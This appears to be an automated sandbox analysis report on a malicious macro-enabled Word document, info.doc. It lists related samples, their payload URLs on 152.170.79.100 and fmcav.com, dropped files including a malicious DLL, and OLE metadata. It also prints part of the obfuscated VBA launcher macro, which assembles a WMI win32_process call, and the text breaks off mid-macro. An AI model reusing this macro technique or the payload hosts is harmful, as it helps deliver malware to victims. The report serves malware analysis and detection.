	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100/76ccih3j36ds48gflq/1agrdm9fi2y0wnk/3huzz5wj9w7/
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100/dwap/ulw9qv3rb7tn3pfmcvj/xibwt6769jdvwhte/zsns1d90vaps/f6yatsbh/
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100/hmjmchef7iewj2uvzf/9pltlpfikujmwtp/e6oaz9n/7m756y/bxs78/
	DAT.doc	Get hash	malicious	Browse	152.170.79.100/al700npvtnac1sp/hyv2ljkpgl5er/ftzaj/82949dvglj88n9/kr054l3td4qgcn0/zer9t3m/
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	152.170.79.100/9h5mkq4rscmn4p5/5i03xqzios0rjfom1p/7ryi6q8v0/iljhnekck1dpk9ng/0umxys8m7lmuc090/jj1uo/
	M3816067.doc	Get hash	malicious	Browse	152.170.79.100/jefmqa7pgn6/a7zeb1l6ir8p/iuii6qu/7x9123680/qwimc/kzg68jfg4cm59iv1/
	messaggio 2912.doc	Get hash	malicious	Browse	152.170.79.100/ldptrzs0lv336pjtc/s28dymelc06393/
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	152.170.79.100/bz77n5i0/aajfq5b2yw7yw59kt33/0ghoxzznyfa8bik7hm1/yiyb7xv8gihti8i/uqf8mgk7iy/
	Documento-2912-122020.doc	Get hash	malicious	Browse	152.170.79.100/iu4g99cxf8oc/
	Documento_I_2612.doc	Get hash	malicious	Browse	152.170.79.100/ipjai1r8tvftp/t2vqr6k1oq2jb2z38/f38ne62mhsuf3mdo/a1z9a6ur8zq6rvcxry/
	Archivo-29.doc	Get hash	malicious	Browse	152.170.79.100/doqyotvh2su6/gilkt2/qw7ipzh4umgoxfdc4gu/4alfk7j/m1en5ykrvqhpj/
190.247.139.101	Informacion_29.doc	Get hash	malicious	Browse
	ARCHIVOFile.doc	Get hash	malicious	Browse
	Doc 2912 75513.doc	Get hash	malicious	Browse
	79685175.doc	Get hash	malicious	Browse
	DATI 2020.doc	Get hash	malicious	Browse
35.208.84.24	Info_122020.doc	Get hash	malicious	Browse	fmcav.com/images/7FV4Nd/
	Documento-2912-122020.doc	Get hash	malicious	Browse	fmcav.com/images/7FV4Nd/
	Documento_I_2612.doc	Get hash	malicious	Browse	fmcav.com/images/7FV4Nd/
	1808_2020.doc	Get hash	malicious	Browse	fmcav.com/images/7FV4Nd/
	09922748 2020 909_3553.doc	Get hash	malicious	Browse	fmcav.com/images/7FV4Nd/
	info-29-122020.doc	Get hash	malicious	Browse	fmcav.com/images/7FV4Nd/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
fmcav.com	Info_122020.doc	Get hash	malicious	Browse	35.208.84.24
	Documento-2912-122020.doc	Get hash	malicious	Browse	35.208.84.24
	Documento_I_2612.doc	Get hash	malicious	Browse	35.208.84.24
	1808_2020.doc	Get hash	malicious	Browse	35.208.84.24
	09922748 2020 909_3553.doc	Get hash	malicious	Browse	35.208.84.24
	info-29-122020.doc	Get hash	malicious	Browse	35.208.84.24

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TelecomArgentinaSAAR	Informacion_29.doc	Get hash	malicious	Browse	190.247.139.101
	i	Get hash	malicious	Browse	181.170.3.37
	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100
	ARCHIVOFile.doc	Get hash	malicious	Browse	190.247.139.101
	Doc 2912 75513.doc	Get hash	malicious	Browse	190.247.139.101
	79685175.doc	Get hash	malicious	Browse	190.247.139.101
	DATI 2020.doc	Get hash	malicious	Browse	190.247.139.101
	7mB0FoVcSn.exe	Get hash	malicious	Browse	200.114.142.40
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100
	DAT.doc	Get hash	malicious	Browse	152.170.79.100
GOOGLE-2US	Adjunto 29 886_473411.doc	Get hash	malicious	Browse	35.209.78.196
	Informacion_29.doc	Get hash	malicious	Browse	35.214.169.246
	Informacion_29.doc	Get hash	malicious	Browse	35.209.78.196
	form.doc	Get hash	malicious	Browse	35.214.199.246
	Nuevo pedido.exe	Get hash	malicious	Browse	35.209.33.122
	Info_122020.doc	Get hash	malicious	Browse	35.208.84.24
	84-2020-98-6493170.doc	Get hash	malicious	Browse	35.208.104.82
	rib.exe	Get hash	malicious	Browse	35.209.110.77
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	35.208.69.64
	Adjunto.doc	Get hash	malicious	Browse	35.214.159.46
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	35.214.159.46
	Documento-2912-122020.doc	Get hash	malicious	Browse	35.208.84.24
	Documento_I_2612.doc	Get hash	malicious	Browse	35.208.84.24
	Archivo-29.doc	Get hash	malicious	Browse	35.208.69.64
	1808_2020.doc	Get hash	malicious	Browse	35.208.84.24
	file 0113165085 323975.doc	Get hash	malicious	Browse	35.214.159.46
	Inf 2020_12_30 FPJ6997.doc	Get hash	malicious	Browse	35.214.159.46
	09648_2020.doc	Get hash	malicious	Browse	35.214.159.46
	bijlagen 658.doc	Get hash	malicious	Browse	35.214.159.46
	File 2020 RVT_724564.doc	Get hash	malicious	Browse	35.214.159.46
TelecomArgentinaSAAR	Informacion_29.doc	Get hash	malicious	Browse	190.247.139.101
	i	Get hash	malicious	Browse	181.170.3.37
	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100
	ARCHIVOFile.doc	Get hash	malicious	Browse	190.247.139.101
	Doc 2912 75513.doc	Get hash	malicious	Browse	190.247.139.101
	79685175.doc	Get hash	malicious	Browse	190.247.139.101
	DATI 2020.doc	Get hash	malicious	Browse	190.247.139.101
	7mB0FoVcSn.exe	Get hash	malicious	Browse	200.114.142.40
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100
	DAT.doc	Get hash	malicious	Browse	152.170.79.100

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\Xts_nmf\P4188qk\U95D.dll	Info_122020.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55694A94-8E09-401E-A760-1A1C7B299BE3}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	3.93139801091909
Encrypted:	false
SSDEEP:	3:M1YKLprulULMprulmX1YKLprulv:MyKLprucMpru3KLpru1
MD5:	800B7561DDD338565F53FBEAF2415880
SHA1:	BE355EEBAD3649495CA4C51B30A25D591F686418
SHA-256:	4B1A366CC926F8DE6FCD418CA512120DB9C1CC2602CAD88319CAA83B604CCBA7
SHA-512:	A0C277D4B1B43A630D54774959E640B395CA59C0A0A6EEBC7FA7D92F5126EB0B45491993A0EA0060A2FDB5512AA7792BD9CE4DAC5088DC09CD42DA5EB357FA38
Malicious:	false
Preview:	[doc]..info.LNK=0..info.LNK=0..[doc]..info.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\info.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Thu Jan 7 23:33:33 2021, length=163840, window=hide
Category:	dropped
Size (bytes):	1960
Entropy (8bit):	4.521955904075999
Encrypted:	false
SSDEEP:	24:8U/XTwz6I4U86+evLkADv3q5dM7dD2U/XTwz6I4U86+evLkADv3q5dM7dV:8U/XT3In3+6e5Qh2U/XT3In3+6e5Q/
MD5:	4DF194CE29C4323BAAFE7D61BB4771D9
SHA1:	9ECEEE2D0C8440C5D5AE1FB9B061B1AB75BA7384
SHA-256:	D99AE496E82434959214FF68405C040ECDFEA4826B6BD91AB49A5D43815A0C99
SHA-512:	9E5A5EB28F24137F830DC16C50F557FFA294D12B848548949F0063D1D4DE0A6433292B607B83BC87F2CA1490202936BC839DA1D7BFEB25C37DA3E486B1B364EF
Malicious:	false
Preview:	L..................F.... ....S...{...S...{..V.a.U................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.....(R1. .info.doc..>.......Q.y.Q.y...8.....................i.n.f.o...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\info.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.f.o...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\92E3LI4JX7C5KZ1U7T5K.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.589434545726938
Encrypted:	false
SSDEEP:	96:chQCsMqiqvsqvJCwofz8hQCsMqiqvsEHyqvJCworZz1PYfH8f8IClUVNIu:cyvofz8yTHnorZz1Bf8IrIu
MD5:	8A1DB58C7320C6A4481EBE01CC1A3568
SHA1:	FC121B65C3445ADF08C94212E6D6FC13C2319AFA
SHA-256:	D716C84859DD7B67ECBC6485B001FF34C4EC176B12705B139B34D8E2F90D4B7A
SHA-512:	BE7CC0320BB009E396A59D51D7137460170040C7FCCD0A387EE3AD2BFF8998090A064C7379CF75D295AA200AD7B95F89CDE0F29B457A4E7802B4F126BF8662BB
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$info.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\Xts_nmf\P4188qk\U95D.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433664
Entropy (8bit):	7.1367980460952545
Encrypted:	false
SSDEEP:	12288:snzOTW1Ig1hxgsjtuEiJ+F9kuwL/1ZBuK2YDcUX3XSP9m:eEW1SEiUFZwLdZVDcUXSA
MD5:	348210F57D94734B89341DAD8F492E7C
SHA1:	6432B34F6BF2C1FA066B85D50F57BA3DF742A90B
SHA-256:	7A045B94A661BA72BD4EC82E99032232C195E7249A386CA04C3349FA8A977B8C
SHA-512:	EEC5805DE545B451B7108466ADE6EC8AD16C77039ACC4633058A5B729BAC6E88A2883FF3A1581EFF33455139D4658DFC9E2A68ADDFCACFAD221024292816D5D4
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 67%, Browse Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: Info_122020.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B........................=...........M.......M.......M...................9.............................z.............Rich....................PE..L......_...........!.................<....... ......................................................................`...P.......P................................%..<...T...............................@............ ..<............................text...c........................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc...%.......&...x..............@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Fantastic Granite Fish Music, Grocery & Books frictionless Avenue Plastic Cambridgeshire Alaska South Dakota Benin brand Clothing & Shoes, Author: Arthur Pons, Template: Normal.dotm, Last Saved By: Alexandre Vincent, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 29 17:32:00 2020, Last Saved Time/Date: Tue Dec 29 17:32:00 2020, Number of Pages: 1, Number of Words: 2312, Number of Characters: 13180, Security: 8
Entropy (8bit):	6.675667644040162
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	info.doc
File size:	162308
MD5:	407e5e05f725d0443a0a6d0d3db22e1f
SHA1:	db34ce7024b5320991b464fa08cfb1d7d9a70d75
SHA256:	174649f1b3e64a89faba9684bd2a160f7785b56449193c9dc412e2ac9672b1ca
SHA512:	c768516efcce9f02664b0588df0d8f3a8626bd77e282c312d93c24ded7e53fc5a02660e5f49235970ea1ef97642a86c316a1597dac0c05d48f5f709def22d964
SSDEEP:	3072:/9ufstRUUKSns8T00JSHUgteMJ8qMD7gsEBhhk:/9ufsfgIf0pL3Lhk
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "info.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Fantastic Granite Fish Music, Grocery & Books frictionless Avenue Plastic Cambridgeshire Alaska South Dakota Benin brand Clothing & Shoes
Author:	Arthur Pons
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Alexandre Vincent
Revion Number:	1
Total Edit Time:	0
Create Time:	2020-12-29 17:32:00
Last Saved Time:	2020-12-29 17:32:00
Number of Pages:	1
Number of Words:	2312
Number of Characters:	13180
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	1252
Number of Lines:	109
Number of Paragraphs:	30
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Ifll4vsaspsrsln6_, Stream Size: 14476

General
Stream Path:	Macros/VBA/Ifll4vsaspsrsln6_
VBA File Name:	Ifll4vsaspsrsln6_
Stream Size:	14476
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . S \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 fc 0a 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 03 0b 00 00 af 29 00 00 00 00 00 00 01 00 00 00 53 5c ab ad 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
ojjQxBE
tAUYHJKI()
wiHJApFp
#JNXMIkJ
"F:\LVTgJDEAH\npDRFjHAI\sJWnCICW.fUhjC"
"F:\jAZCT\DySvBJIFG\hAlfC.fnSKCJJG"
yVoQA()
Access
sbKLC:
Len(mKbjhqs))
oBgib()
tAUYHJKI
PwWkBCkb:
#JNXMIkJ,
Resume
"F:\SUBaGhI\zSrEaFB\FspCHJf.SAqAGV"
zboNH:
JNXMIkJ
IHoUEFCF
zboNH
sgHzJ
"O:\FbzvAFHGg\ZHHZEbi\hGbdjB.VomiwAsk"
"F:\hGyrGI\qHGrBJsd\hZWkGjB.TBolF"
LOSnJ
#pRgPTIRad
ZYftoBlCA
#uqnnDLEb,
"O:\eFmrAZDJ\nodmnAAxD\xMUzkGzO.sFkRlmCCY"
fLfZBI
#bqPAAAGJF
FreeFile
ylBklGy
VRkXRq()
"O:\RfnuCBKG\RjeSEoI\GLSpIJCI.ANupdJL"
ARnfVzJ()
LOF(intGend)
#ZuVZXFr,
vKTLOEO
VRkXRq
CNtZFGE:
CNtZFGE
#uqnnDLEb
#ylBklGy
#vKTLOEO
"O:\TQdsrqGBm\AbFeNCGGl\ZclnC.IOmblH"
SlnFEwSdl
"F:\pqfpqwI\YzHAAE\adNkxHr.XKNlnB"
kBCsI
RbyyHrjpJ
pwSExduL
ARnfVzJ
pRgPTIRad
#itkMEH,
"F:\tLhtGJJqI\EDSME\OnHhcF.CjTGdBI"
ZuVZXFr
KmguP()
aPgSXHG
#AZymJ,
snahbsd
xIvSdpG()
wiHJApFp()
SlnFEwSdl()
ReDim
VRvXeA
bJVPQIOWp
"O:\nkxEJGB\DgDXEE\oddtym.UhBlGPJk"
#fLfZBI
mbAfpsdI
#yrkIKRGIk,
uNLRGVB:
"F:\XuogCJjvl\BqVwVOI\aWwKBeC.QabEyMDF"
#wiMPPMQc,
"O:\FNlPqdU\yMDerBjAI\HYROCHJJ.obdMDCd"
#itkMEH
"F:\gqMAa\hIkBCIoDH\plQXC.MztsGVF"
#kBCsI
WZuyub()
KGneUHDB()
BdzlIFvyB
BdzlIFvyB()
igkzHsOD
"O:\SmEZL\EulgpIBLC\aXBYFG.JSmAKD"
bqPAAAGJF
"F:\uTBiHl\uVbXFT\YbwYGKJ.PIcgwCw"
"O:\ntNeiY\DmIxDvJb\rzyKG.zgDFq"
"F:\jiGtVhMWY\HYRMl\sHfYJF.RwMSIa"
"O:\HEriW\OlyoIMJE\lhMoF.pEJsB"
"F:\LaXzEEPVS\NELWEaJG\TvjLE.YwLcJF"
#vKTLOEO,
#SKhtFjI,
TXAJH
#RbyyHrjpJ,
AZymJ
Binary
oBgib
itkMEH
PwWkBCkb
"O:\juvxiJER\okAYJCIY\JGRYR.uKbmHCRyH"
VRvXeA:
#kBCsI,
bJVPQIOWp()
"F:\OanxNh\dmwfIytAI\zSVYCAEwA.eRhegND"
#ylBklGy,
bUpzhB
WZuyub
#IgKEcDFq,
wiMPPMQc
"F:\FjsdhD\AqrMDHJ\RrhsGh.utzPF"
IcahCDE
vKyPeD:
"O:\eutDC\eaAYCHl\GObSFCs.YOftniIh"
aPgSXHG:
UvQBBwrx
Integer
uqnnDLEb
yrkIKRGIk
MowsUK
IgKEcDFq
IcahCDE()
"F:\dspcUmGA\PMKDFbO\iCTaGACDi.CsLkJA"
rvCQBGwH
#IgKEcDFq
#bqPAAAGJF,
"O:\SXlgB\DObjDDYJ\QnwLfF.xhiJBAa"
KGneUHDB
aIQdBCWAF:
Error
yVoQA
#AZymJ
uNLRGVB
#pRgPTIRad,
Attribute
mKbjhqs
MowsUK:
Mid(mKbjhqs,
#yrkIKRGIk
"O:\mTLIDFEFC\bGpevAI\mKHebIDW.ZGhQAyrF"
Close
LOSnJ:
"F:\dNNXEFJ\acmbFAE\woxMJXHDE.TtPXl"
#RbyyHrjpJ
SKhtFjI
#wiMPPMQc
"O:\roUOVDGAi\QQqsN\fndTk.RhhqJ"
VB_Name
"F:\PAFYG\mWmxJc\vrNVIZEL.qwRWQ"
sgHzJ:
mbAfpsdI()
#UvQBBwrx,
#UvQBBwrx
#fLfZBI,
Function
hrvxHJQBI
hrvxHJQBI()
aIQdBCWAF
igkzHsOD()
"O:\akOoEIaA\bOFYdJcGA\trHdDHG.hGdTbM"
"O:\GihTHDyJ\xMEpEDFW\QjvPEbIGE.jZthRA"
sbKLC
"F:\zqXTADCAY\zBSUhACoC\QyjtDIZqF.VuLfJHDC"
#TXAJH
"O:\qSjvl\yUGgtdAWG\oVioFFBy.quDugF"
"F:\xJozuHdEN\ADlgItJx\YfYaiFhDE.kZcvDrGGq"
"O:\ndcDJ\EmuLtI\DzqYCH.rPICspJ"
vKyPeD
#ZuVZXFr
#SKhtFjI
bUpzhB()
ZYftoBlCA:
rvCQBGwH:
KmguP
zJHKYzJ:
ojjQxBE:
pwSExduL:
IHoUEFCF:
#TXAJH,
xIvSdpG
zJHKYzJ

VBA Code

Attribute VB_Name = "Ifll4vsaspsrsln6_"
Function Z9zoxbjstfyh_817c()
On Error Resume Next
mKbjhqs = Sjtq5nhmztw.StoryRanges.Item(244 / 244)
   GoTo uNLRGVB
Dim wiHJApFp() As Byte
Dim RbyyHrjpJ As Integer
RbyyHrjpJ = FreeFile
Open "F:\PAFYG\mWmxJc\vrNVIZEL.qwRWQ" For Binary Access Read As #RbyyHrjpJ
Open "O:\TQdsrqGBm\AbFeNCGGl\ZclnC.IOmblH" For Binary Access Read As #RbyyHrjpJ
ReDim wiHJApFp(1 To LOF(intGend) - 5)
Get #RbyyHrjpJ, , wiHJApFp
Get #RbyyHrjpJ, , wiHJApFp
Get #RbyyHrjpJ, , wiHJApFp
Close #RbyyHrjpJ
uNLRGVB:
snahbsd = "]b2[sp]b2[s"
R_7umfo9pai6z7f3 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
   GoTo zboNH
Dim oBgib() As Byte
Dim JNXMIkJ As Integer
JNXMIkJ = FreeFile
Open "F:\uTBiHl\uVbXFT\YbwYGKJ.PIcgwCw" For Binary Access Read As #JNXMIkJ
Open "O:\roUOVDGAi\QQqsN\fndTk.RhhqJ" For Binary Access Read As #JNXMIkJ
ReDim oBgib(1 To LOF(intGend) - 5)
Get #JNXMIkJ, , oBgib
Get #JNXMIkJ, , oBgib
Get #JNXMIkJ, , oBgib
Close #JNXMIkJ
zboNH:
Jl4wo9mfpjo6pj3xt = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
   GoTo ojjQxBE
Dim BdzlIFvyB() As Byte
Dim pRgPTIRad As Integer
pRgPTIRad = FreeFile
Open "F:\jiGtVhMWY\HYRMl\sHfYJF.RwMSIa" For Binary Access Read As #pRgPTIRad
Open "O:\akOoEIaA\bOFYdJcGA\trHdDHG.hGdTbM" For Binary Access Read As #pRgPTIRad
ReDim BdzlIFvyB(1 To LOF(intGend) - 5)
Get #pRgPTIRad, , BdzlIFvyB
Get #pRgPTIRad, , BdzlIFvyB
Get #pRgPTIRad, , BdzlIFvyB
Close #pRgPTIRad
ojjQxBE:
Scck4sogtl85xp = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
   GoTo IHoUEFCF
Dim bJVPQIOWp() As Byte
Dim UvQBBwrx As Integer
UvQBBwrx = FreeFile
Open "F:\dspcUmGA\PMKDFbO\iCTaGACDi.CsLkJA" For Binary Access Read As #UvQBBwrx
Open "O:\mTLIDFEFC\bGpevAI\mKHebIDW.ZGhQAyrF" For Binary Access Read As #UvQBBwrx
ReDim bJVPQIOWp(1 To LOF(intGend) - 5)
Get #UvQBBwrx, , bJVPQIOWp
Get #UvQBBwrx, , bJVPQIOWp
Get #UvQBBwrx, , bJVPQIOWp
Close #UvQBBwrx
IHoUEFCF:
Zl17yx41b82ep = "]b2[ss]b2[s"
   GoTo aPgSXHG
Dim hrvxHJQBI() As Byte
Dim kBCsI As Integer
kBCsI = FreeFile
Open "F:\zqXTADCAY\zBSUhACoC\QyjtDIZqF.VuLfJHDC" For Binary Access Read As #kBCsI
Open "O:\nkxEJGB\DgDXEE\oddtym.UhBlGPJk" For Binary Access Read As #kBCsI
ReDim hrvxHJQBI(1 To LOF(intGend) - 5)
Get #kBCsI, , hrvxHJQBI
Get #kBCsI, , hrvxHJQBI
Get #kBCsI, , hrvxHJQBI
Close #kBCsI
aPgSXHG:
Px1h3ufov74hylz = Scck4sogtl85xp + Zl17yx41b82ep + Jl4wo9mfpjo6pj3xt + snahbsd + R_7umfo9pai6z7f3
   GoTo MowsUK
Dim mbAfpsdI() As Byte
Dim IgKEcDFq As Integer
IgKEcDFq = FreeFile
Open "F:\FjsdhD\AqrMDHJ\RrhsGh.utzPF" For Binary Access Read As #IgKEcDFq
Open "O:\juvxiJER\okAYJCIY\JGRYR.uKbmHCRyH" For Binary Access Read As #IgKEcDFq
ReDim mbAfpsdI(1 To LOF(intGend) - 5)
Get #IgKEcDFq, , mbAfpsdI
Get #IgKEcDFq, , mbAfpsdI
Get #IgKEcDFq, , mbAfpsdI
Close #IgKEcDFq
MowsUK:
Btq8kso8ps4ew80gk = Njcpw_phi02f0(Px1h3ufov74hylz)
   GoTo pwSExduL
Dim yVoQA() As Byte
